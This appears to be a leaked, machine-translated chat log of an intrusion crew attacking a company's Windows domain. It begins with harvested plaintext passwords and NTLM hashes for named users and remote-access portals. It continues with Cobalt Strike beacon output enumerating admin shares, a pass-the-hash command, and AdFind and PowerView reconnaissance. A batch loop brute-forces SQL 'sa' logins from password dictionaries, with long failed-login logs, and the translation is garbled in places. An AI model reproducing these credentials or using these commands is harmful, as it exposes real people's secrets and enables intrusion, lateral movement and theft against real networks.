AM,13177181903702855,nicd@leadingedgeequip.com,vgy7vgy7VGY ``Go to the domain itself mb there redirect different, there since 2014 access is preserved) go to the full link? Well, it still does not work to the fact that it itself is external and I do not know whether through it to go to the domainada neti from outside do not go it is an external citra? 2fa ``` https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$ `` doesn't go to the link, not even under the proxy of the machine you took it out of ``. https://w08041911191-ndleading-jdossn-local-wocqspajes.app01-17.logmein.com/,5/1/2020 3:42:22 PM,13232839342283382,nddevbernst,Nrb11232010!
`````` https://micservice190-ndleading-jdossn-local-arzkebwqmq.lmi-app14-01.logmein.com/,10/20/2020 11:15:16 AM,13247684116208716,nddevbernst,NDleading2021! `````` https://identity.webrootanywhere.com/,https://identity.webrootanywhere.com/v1/Account/login,3/16/2020 3:54:55 PM,13228865695219331,blainee@leadingedgeequip.com,ShadowFox5640! https://johndeere.okta.com/,https://johndeere.okta.com/login/login.htm,3/13/2020 2:09:15 PM,13228600155038654,X096743,Nrb11232010! https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,2/5/2020 11:22:52 AM,13225396972110903,nddevbernst,mko0MKO)mko0MKO) https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$ https://w08041912191-hewsstpmaj.app12-11.logmein.com/,https://w08041912191-hewsstpmaj.app12-11.logmein.com/,4/29/2020 8:54:24 AM,13232642064233077,nddevbernst,Nrb11232010! https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,4/29/2020 3:26:37 PM,13232665597610069,PARTS100,Parts100 https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,5/1/2020 10:48:43 AM,13232821723796642,devi201,Deere100 https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,8/26/2020 7:41:36 AM,13242919296305003,nddevbernst,Combine20! ``As long as he's caught with Citrix, try to get started too,`` by the way. https://remotedesktop.google.com/,https://remotedesktop.google.com/access,8/27/2019 5:48:39 PM,13211419719369994,Blaine Home PC,11232010 `````` https://res.cisco.com/websafe/register,12/29/2016 10:16:37 AM,13127501797078616,Ernst,Jibs5640 `````` https://heritage-webapps.cvty.com/Citrix/Heritage-XenApp/auth/login.aspx,5/21/2014 7:11:20 AM,13045147880000000,A579851,oneway$5 `````` * Username : nddevbernst * Domain : JDOSSN * NTLM : 5b622ad5d550408ed6260c2b8fb185cc * Password : Tractor20! 
* Username : nddevkodell * Domain : JDOSSN * NTLM : 8de4a768f02760e576c5a5bb59c97771 * Username : nddeviowlbo * Domain : JDOSSN * NTLM : 4fd547943802ebb200777a443d3b06a4 * Password : NDspring2020 `````` \JDOXADCD3.jdossn.local\ADMIN$ - Remote Admin \JDOXADCD3.jdossn.local\C$ - Default share \JDOXADCD3.jdossn.local\CtxSTShare - \JDOXADCD3.jdossn.local\IPC$ - Remote IPC ``Check yet and it's not forbidden here``. beacon> shell wmic /node:10.28.92.159 OS GET Name [*] Tasked beacon to run: wmic /node:10.28.92.159 OS GET Name [+] host called home, sent: 66 bytes [+] received output: Node - 10.28.92.159 ERROR: Description = The RPC server is unavailable. \W080332420b ndleading jdossn local\ADMIN$ - Remote Admin \W080332420b.ndleading.jdossn.local\ADMIN$ - Remote Admin \W080332420b.ndleading.jdossn.local\C$ - Default share \W080332420b.ndleading.jdossn.local\D$ - Default share \W080332420b.ndleading.jdossn.local\IPC$ - Remote IPC \W080332420b.ndleading.jdossn.local\Nic's Printer - Nic's Printer \W080332420b.ndleading.jdossn.local\print$ - Printer Drivers \W0W80332420b.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6 \\W080332420b.ndleading.jdossn.local\Users - ``or access to the rps service in general the admin ball should indicate the possibility of using the vmik utility and he just spit and spit them slowly still in the lab I remember how to run not glance at the sharpshare looks sharpsharefinder gives results already after the full completion of the scan so it's like sharpshare not in my processes so it's spit out noo sharfinder I ran it without output to a file not hashdump not do mimic not output under the system the session is nuts I don't know what it even is or still not working it's still working but I xvorvor it's sharfinder JID PID Description --- --- ----------- 51 72412 process 52 218268 process 74,996 PowerShell (Unmanaged) ``in johns* yesterday SharpShares was hanging in the processes I don't know what of it SharpShares saw admin 
balls there? and yesterday it didn't spit out these balls came now ShareFinder yesterday I used SharpShares before weekend at all low grade scans no 1 - then to question above `` beacon> shell dir \\10.28.92.159\ADMIN$ [*] Tasked beacon to run: dir \\10.28.92.159\ADMIN$ [+] host called home, sent: 56 bytes [+] received output: Access is denied. ``I still have a list of folders in admin ball?`` I immediately did "copy" on accessibility in the plan? how did you check the balls? but when I copy the case - Access is deleted then daon sees them how? on the ball for some reason it is not allowed in the subnet other than under that polzak above? there are many admin ball? [+] received output: \JDODHCP02.jdossn.local\ADMIN$ - Remote Admin \JDODHCP02.jdossn.local\C$ - Default share \JDODHCP02.jdossn.local\IPC$ - Remote IPC [+] received output: \tannerflanigan.ndleading.jdossn.local\ADMIN$ - Remote Admin \tannerflanigan.ndleading.jdossn.local\C$ - Default share \tannerflanigan.ndleading.jdossn.local\IPC$ - Remote IPC \tannerflanigan.ndleading.jdossn.local\NPI602973 (HP LaserJet 400 M401dne) - Back Shop \tannerflanigan.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \\JDOSQLEAST1C.jdossn.local\ADMIN$ - Remote Admin \JDOSQLEAST1C.jdossn.local\C$ - Default share \JDOSQLEAST1C.jdossn.local\E$ - Default share \JDOSQLEAST1C.jdossn.local\G$ - Default share \JDOSQLEAST1C.jdossn.local/IPC$ - Remote IPC \JDOSQLEAST1C.jdossn.local\J$ - Default share \JDOSQLEAST1C.jdossn.local\M$ - Default share \JDOSQLEAST1C.jdossn.local/Q$ - Default share \JDOSQLEAST1C.jdossn.local\T$ - Default share \JDOSQLEAST1C.jdossn.local\V$ - Default share [+] received output: \W0W8987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987711192.ndleading.jdossn.local\C$ - Default share \W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne) \\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers \W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4) [+] received output: \\JDODC61.jdossn.local\ADMIN$ - Remote Admin \JDODC61.jdossn.local\C$ - Default share \JDODC61.jdossn.local/IPC$ - Remote IPC \JDODC61.jdossn.local/Lockouts - \JDODC61.jdossn.local/NETLOGON - Logon server share \JDODC61.jdossn.local\SYSVOL - Logon server share [+] received output: \JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin \JDOXADIRC1.jdossn.local\C$ - Default share \JDOXADIRC1.jdossn.local\IPC$ - Remote IPC [+] received output: \\JDODHCP04.jdossn.local\ADMIN$ - Remote Admin \JDODHCP04.jdossn.local\C$ - Default share \JDODHCP04.jdossn.local\IPC$ - Remote IPC [+] received output: \DESKTOP-GCPB49A.ndleading.jdossn.local\ADMIN$ - Remote Admin \DESKTOP-GCPB49A.ndleading.jdossn.local\C$ - Default share \DESKTOP-GCPB49A.ndleading.jdossn.local\D$ - Default share \DESKTOP-GCPB49A.ndleading.jdossn.local\IPC$ - Remote IPC \DESKTOP-GCPB49A.ndleading.jdossn.local/NPI7CF108 (HP Color LaserJet MFP M477fdw) - NPI7CF108 (HP Color LaserJet MFP M477fdw) \DESKTOP-GCPB49A.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \W0887261216KO.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W887261216KO.ndleading.jdossn.local\C$ - Default share \W0W887261216KO.ndleading.jdossn.local\D$ - Default share \W0W887261216KO.ndleading.jdossn.local\E$ - Default share \W0W887261216KO.ndleading.jdossn.local\IPC$ - Remote IPC \W0887261216KO.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \\JDOdc65.jdossn.local\ADMIN$ - Remote Admin \JDOdc65.jdossn.local\C$ - Default share \JDOdc65.jdossn.local\DealerConfig - \JDOdc65.jdossn.local\EQAPP - \JDOdc65.jdossn.local\EQDBBackup - \JDOdc65.jdossn.local\EQPROF - \JDOdc65.jdossn.local\EQUIPArchive - 
\JDOdc65.jdossn.local\EQUIPAttachments - \JDOdc65.jdossn.local\EQUIPREPORTS - \JDOdc65.jdossn.local\HomeDirs - \JDOdc65.jdossn.local\IPC$ - Remote IPC \\Lockouts - Lockout logs \JDOdc65.jdossn.local\MISCPROF - \JDOdc65.jdossn.local\MXHomeDirs - \JDOdc65.jdossn.local\MXShares - \JDOdc65.jdossn.local\NETLOGON - Logon server share \\Logon server share \JDOdc65.jdossn.local\SD - \JDOdc65.jdossn.local/SDAttach - \JDOdc65.jdossn.local/SDPROF - \JDOdc65.jdossn.local\Shares - \JDOdc65.jdossn.local\SYSVOL - Logon server share [+] received output: \\Jdodc51.jdossn.local\ADMIN$ - Remote Admin \Jdodc51.jdossn.local\C$ - Default share \Jdodc51.jdossn.local\D$ - Default share \\Jdodc51.jdossn.local\F$ - Default share \Jdodc51.jdossn.local\IPC$ - Remote IPC \Jdodc51.jdossn.local/Lockouts - \Jdodc51.jdossn.local/NETLOGON - Logon server share \\{\Jdodc51.jdossn.local\print$ - Printer Drivers \Jdodc51.jdossn.local\SYSVOL - Logon server share [+] received output: \DNDMIC61.jdossn.local\ADMIN$ - Remote Admin \DNDMIC61.jdossn.local\C$ - Default share \DNDMIC61.jdossn.local\IPC$ - Remote IPC [+] received output: \\JDOSQLEAST1D.jdossn.local\ADMIN$ - Remote Admin \JDOSQLEAST1D.jdossn.local\C$ - Default share \JDOSQLEAST1D.jdossn.local\E$ - Default share \JDOSQLEAST1D.jdossn.local\G$ - Default share \JDOSQLEAST1D.jdossn.local/IPC$ - Remote IPC \JDOSQLEAST1D.jdossn.local\J$ - Default share \JDOSQLEAST1D.jdossn.local\M$ - Default share \JDOSQLEAST1D.jdossn.local/Q$ - Default share \JDOSQLEAST1D.jdossn.local\T$ - Default share \JDOSQLEAST1D.jdossn.local\V$ - Default share [+] received output: \JDOXADCC3.jdossn.local\ADMIN$ - Remote Admin \JDOXADCC3.jdossn.local\C$ - Default share \JDOXADCC3.jdossn.local\CtxSTShare - \JDOXADCC3.jdossn.local\IPC$ - Remote IPC [+] received output: \JDOXADIRD1.jdossn.local\ADMIN$ - Remote Admin \JDOXADIRD1.jdossn.local\C$ - Default share \JDOXADIRD1.jdossn.local\IPC$ - Remote IPC [+] received output: \jdopbi01.jdossn.local\ADMIN$ - Remote Admin 
\jdopbi01.jdossn.local\C$ - Default share \jdopbi01.jdossn.local\IPC$ - Remote IPC [+] received output: \KNDMICEQRD61.jdossn.local\ADMIN$ - Remote Admin \KNDMICEQRD61.jdossn.local\ASAData - \KNDMICEQRD61.jdossn.local\ASALogs - \KNDMICEQRD61.jdossn.local\Backups - \KNDMICEQRD61.jdossn.local\C$ - Default share \KNDMICEQRD61.jdossn.local\E$ - Default share \KNDMICEQRD61.jdossn.local\G$ - Default share \KNDMICEQRD61.jdossn.local\IPC$ - Remote IPC \KNDMICEQRD61.jdossn.local\L$ - Default share \KNDMICEQRD61.jdossn.local\M$ - Default share \KNDMICEQRD61.jdossn.local\MirrorLogs - \KNDMICEQRD61.jdossn.local\P$ - Default share \KNDMICEQRD61.jdossn.local\SQLRemote - \KNDMICEQRD61.jdossn.local\T$ - Default share \KNDMICEQRD61.jdossn.local\Temp - [+] received output: \\JDODC69.jdossn.local\ADMIN$ - Remote Admin \JDODC69.jdossn.local\C$ - Default share \JDODC69.jdossn.local\IPC$ - Remote IPC \JDODC69.jdossn.local/lockouts - \JDODC69.jdossn.local/NETLOGON - Logon server share \JDODC69.jdossn.local\SYSVOL - Logon server share [+] received output: \\JDODC64.jdossn.local\ADMIN$ - Remote Admin \JDODC64.jdossn.local\C$ - Default share \JDODC64.jdossn.local\DealerConfig - \JDODC64.jdossn.local\EQAPP - \JDODC64.jdossn.local\EQDBBackup - \JDODC64.jdossn.local\EQPROF - \JDODC64.jdossn.local\EQUIPArchive - \JDODC64.jdossn.local\EQUIPAttachments - \JDODC64.jdossn.local\EQUIPREPORTS - \JDODC64.jdossn.local\HomeDirs - \JDODC64.jdossn.local\IPC$ - Remote IPC \JDODC64.jdossn.local/lockouts - \JDODC64.jdossn.local\MISCPROF - \JDODC64.jdossn.local\MXHomeDirs - \JDODC64.jdossn.local\MXShares - \JDODC64.jdossn.local\NETLOGON - Logon server share \\JDODC64.jdossn.local/SD \\SD - SDAttach - SDAttach - SDAttach. 
\JDODC64.jdossn.local/SDPROF - \JDODC64.jdossn.local\Shares - \JDODC64.jdossn.local\SYSVOL - Logon server share [+] received output: \JDOXADCC1.jdossn.local\ADMIN$ - Remote Admin \JDOXADCC1.jdossn.local\C$ - Default share \JDOXADCC1.jdossn.local\CtxSTShare - \JDOXADCC1.jdossn.local\IPC$ - Remote IPC [+] received output: \SNDMIC61.jdossn.local\ADMIN$ - Remote Admin \SNDMIC61.jdossn.local/APPS - EQUIP APPS Share \SNDMIC61.jdossn.local\AUTO-IT - EQUIP AUTO-IT Share \SNDMIC61.jdossn.local\C$ - Default share \SNDMIC61.jdossn.local\DPM - EQUIP DPM Share \SNDMIC61.jdossn.local/DSJDIS - \SNDMIC61.jdossn.local\EPC - EQUIP EPC Share \SNDMIC61.jdossn.local\EQUIP - EQUIP EQUIP Share \SNDMIC61.jdossn.local/IPC$ - Remote IPC \SNDMIC61.jdossn.local/JDDTF - EQUIP JDDTF Share \SNDMIC61.jdossn.local/SDDigitalSignature - \SNDMIC61.jdossn.local\Units_Data - EQUIP Units_Data Share [+] received output: \\JDOCHOPS12.jdossn.local\ADMIN$ - Remote Admin \JDOCHOPS12.jdossn.local\C$ - Default share \JDOCHOPS12.jdossn.local\E$ - Default share \JDOCHOPS12.jdossn.local\IPC$ - Remote IPC [+] received output: \W0W8987711191.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987711191.ndleading.jdossn.local\C$ - Default share \W0W8987711191.ndleading.jdossn.local\dominics - dominics \W0W8987711191.ndleading.jdossn.local\IPC$ - Remote IPC \W0W8987711191.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \W088726121926.ndleading.jdossn.local\ADMIN$ - Remote Admin \W088726121926.ndleading.jdossn.local\C$ - Default share \W088726121926.ndleading.jdossn.local\D$ - Default share \W088726121926.ndleading.jdossn.local\IPC$ - Remote IPC \W088726121926.ndleading.jdossn.local\Nic's Printer - Nic's Printer \W088726121926.ndleading.jdossn.local\print$ - Printer Drivers \W0W88726121926.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6 \\W088726121926.ndleading.jdossn.local\Users - [+] received output: \JDOXADCC2.jdossn.local\ADMIN$ - Remote Admin \JDOXADCC2.jdossn.local\C$ 
- Default share \JDOXADCC2.jdossn.local\CtxSTShare - \JDOXADCC2.jdossn.local\IPC$ - Remote IPC [+] received output: \KNDMICEQDB61.jdossn.local\ADMIN$ - Remote Admin \KNDMICEQDB61.jdossn.local\ASAData - \KNDMICEQDB61.jdossn.local\ASALogs - \KNDMICEQDB61.jdossn.local\ASATestData - \KNDMICEQDB61.jdossn.local\Backups - \KNDMICEQDB61.jdossn.local\C$ - Default share \KNDMICEQDB61.jdossn.local\E$ - Default share \KNDMICEQDB61.jdossn.local\F$ - Default share \KNDMICEQDB61.jdossn.local\G$ - Default share \KNDMICEQDB61.jdossn.local\IPC$ - Remote IPC \KNDMICEQDB61.jdossn.local\L$ - Default share \KNDMICEQDB61.jdossn.local\M$ - Default share \KNDMICEQDB61.jdossn.local\MirrorLogs - \KNDMICEQDB61.jdossn.local\P$ - Default share \KNDMICEQDB61.jdossn.localSQLRemote - \KNDMICEQDB61.jdossn.local\T$ - Default share \KNDMICEQDB61.jdossn.local\Temp - ```pth JDOSSN\nddevbernst 5b622ad5d550408ed6260c2b8fb185cc``` dhsawspilot01.jdossn.local [10.99.194.150] W088726121943.ndleading.jdossn.local [10.28.92.159] JDOAWSSUP01.jdossn.local [10.99.207.196] W08987712192.ndleading.jdossn.local [10.29.220.125] `````` [+] received output: \dhsawspilot01.jdossn.local\ADMIN$ - Remote Admin \dhsawspilot01.jdossn.local\C$ - Default share \dhsawspilot01.jdossn.local\E$ - Default share \dhsawspilot01.jdossn.local\IPC$ - Remote IPC [+] received output: \W088726121943.ndleading.jdossn.local\ADMIN$ - Remote Admin \W088726121943.ndleading.jdossn.local\C$ - Default share \W088726121943.ndleading.jdossn.local\Caseys - Caseys \W088726121943.ndleading.jdossn.local\D$ - Default share \W088726121943.ndleading.jdossn.local\IPC$ - Remote IPC \W088726121943.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \\JDOAWSSUP01.jdossn.local\ADMIN$ - Remote Admin \JDOAWSSUP01.jdossn.local\C$ - Default share \JDOAWSSUP01.jdossn.local\D \JDOAWSSUP01.jdossn.local\D$ - Default share \JDOAWSSUP01.jdossn.local\E$ - Default share \JDOAWSSUP01.jdossn.local\IPC$ - Remote IPC [+] received output: 
\W0W8987712192.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987712192.ndleading.jdossn.local\C$ - Default share \W0W8987712192.ndleading.jdossn.local\D$ - Default share \WW08987712192.ndleading.jdossn.local\HP LaserJet Pro MFP M426f-M427f PCL-6 - HP LaserJet Pro MFP M426f-M427f PCL-6 \W0W8987712192.ndleading.jdossn.local\IPC$ - Remote IPC \WW08987712192.ndleading.jdossn.local\MS Publisher Color Printer - MS Publisher Color Printer \W0W8987712192.ndleading.jdossn.local\print$ - Printer Drivers ````AdFind -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn` there's an example belowhttp://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx above from here as in a hurry understood the format DC=server,DC=comkey-b parameter`` shell adfind.exe -f "(objectcategory=person)" -s base > ad_users.txt ``base where do I put it? C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. 
C:\Users\Administrator\Desktop\ping>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program ``You still have 4 minutes to google if you don't, google if you specify basea adfain won't work under token I wonder? no password length not lockoutaokay analog of net accounts in powerview how to get it?``The other thing)`` Unicode : @{Unicode=yes} SystemAccess : @{RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0} KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1} Version : @{signature="$CHICAGO$"; Revision=1} PrivilegeRights : @{SeBatchLogonRight=System.Object[]; SeLoadDriverPrivilege=*S-1-5-21-742535178-4155275036-2790254320-513} EventAudit : @{AuditDSAccess=1} RegistryValues : Path : \\matches.com\sysvol\matches.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\ MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf GPOName : {31B2F340-016D-11D2-945F-00C04FB984F9} GPODisplayName : Domain - Default Domain Policy ````MATCHES\Louisad M@tches2020!!!` `MATCHES\mercedesd Dinham2323 `in jobs vicito works now made Louise's token, requested DomainPolicy to conf conf8 min for this all-cocken should start. now doing@tl1 aha, true token domain user tried? authorization vpn goes through radius rather than directly through hell, understand? you're accessing a pc that DOES NOT KNOW about the domain from the context of a user who is NOT in the domain-seek a way to access with the domain tokens in the fuck - OFFICE - give me another 1000 messages why the fuck don't you say something? didn't get it - the office - who got it? no one fucking got it so write 100,000,000 messages here. I already explained it to you.
why the fuck do i have to go through this again and explain to you now you can't run it from a domain user because your machine isn't joined to a domain+1''. [*] 10/03 18:17:46 - Executing PowerView Get-DomainPolicyData via PowerPick [*] Tasked beacon to run: Get-DomainPolicyData -Domain matches.com (unmanaged) [+] host called home, sent: 133715 bytes [+] received output: ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or ERROR: could not be contacted. ERROR: " ERROR: At line:13117 char:24 ERROR: + else { $Results = $GPOSearcher.FindAll() } ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : COMException ERROR: ``okay, ad_user is shot through powerview fine, why when I shoot DomainPolicy I get ``wrong creeds you have here``? everything is taken off without the credits, there won't be time to think about it in real objects - in real objects there won't be time to think about the fuck you're talking about if i don't see guys writing 100 fucking times what to do and the timer goes to minutes, then it's a fucking analytical problem if there are any questions for me - contact me directlyDiscord takes 5 minutes to postTeamLead1, TeamLead2 - let them all install Discord and share their screens If they're so smart, they can show you "the goods face" in real time and everything will be clear, if only because the standard polisy on the reset is 30 minutes, there will be no lockout ok. whatever check it blindlycall it? ...... if you can go to ldap to remove hell through powerview we with grandfather as we check it out through powerview i wrote above that WE ARE NOT IN THE DOMAIN? is hell removed? we are sitting under a wpn it does not work out does it say anything?) net accounts /dombadpasswordcount oxxxxxxx it's not Blindness from tnt telling the script what's the point of it? 
when the lockout is near it's skipped of course it's skipped of course you use the script to check when autobrouting? fuck. is that even a question? we checked three passwords yesterday yes, we have no way to check the lockout policy of the domain they will not fly into the lock if they check now? the second is to check the LA Credentials data on DIFFERENT groups of servers and APMs - all this is in the AD it makes sense to check it on all domain admins the first thing to do as it is a new pass and it is EXACTLY the technical can try to play with SID play but it is not sure .37 does not stick `` `` [-] 10.1.4.4:445 - 10.1.4.4:445 - Failed: '.\Administrator:XhY?8WJSI', ``understood, didn't control user8 that it was brute-force, how do we know which groups the machine is in? if we're pulling that from the group policies? changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" ``` this is a clear indication that this is a local user of some PC, and definitely not a service account, I understand that everyone wants to drink beer and have a rest, but let's stop the stupor and productively work off the crumbs of data that are available and not slushkullserver . it's not even fucking funny anymore why test this pass on 1433? [-] 10.7.20.30:445 - 10.7.20.30:445 - Failed: '.\Administrator:XhY?8WJSI', ``` ``` [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: ) ``Guys, we're fucking sysadmins after all. we're the ones who should understand the logic of group policies. LA from GPO will be either on specific machines which are in specific groups or on network segments on sid?
@tl1 make a correction: check the user and server machines belonging to specific subnets; check the DCs, the SQL servers and a couple of user PCs. That may be everywhere, you know; this is from group policies.
LA where?
Password for LA: XhY?WJSI
[ ](https://mediaeveryone.com/group/matches?msg=icgaSNNqbnCtwaMpJ)
This is the list of domain computers that the admins have in the share.
40 minutes to google this is long.
How long ago did it work?)
Your task. Did anyone google it?) It's been 50 minutes.) Solved?

```
for /f %s in (srv.txt) do @ (echo %s)
```

There should be no error here.)))) What do we have?

```
for /f %s in (srv.txt) do @ (echo %s)
```

And so add () for the first loop?

```
for /f %s in (srv.txt) do @ for /f %p in (pwd.txt) do @ (osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
```

Who wrote the batch files?
No, I won't tell you. It's a mystery. I would pay attention to parentheses.)
But @tl2 did not tell me where the error is, just my assumption that I need to add parentheses somewhere else, all right?
`%p` is a variable from the dictionary of passwords.

```
do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt
```

Where at the end of it you see 2 loops. Who can write batch files or code in any language, but can make queries in the database under the accesses; it does not search by itself. You have 2 dictionaries: srv.txt, pwd.txt. I do not think that it was necessary to explain the first one.)
`-Q matches.com`?
[ ](https://mediaeveryone.com/group/matches?msg=NMnPWq9doKJzA9H6s)
But if you think about it?

```
beacon> shell osql.exe -U sa
[*] Tasked beacon to run: osql.exe -U sa
[+] host called home, sent: 45 bytes
[+] received output:
Password:
```

The question is what to run. Everything should be in the same folder, right? Just put osql.exe on the dedicated server, and in the same folder with it srv.txt and pwd.txt; it will form result.txt. Long?
```
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )
```

"PasswordA€" looks like a broken symbol. Try PasswordA.

```
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
```

Check another dictionary from @tl2 with the script.

```
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
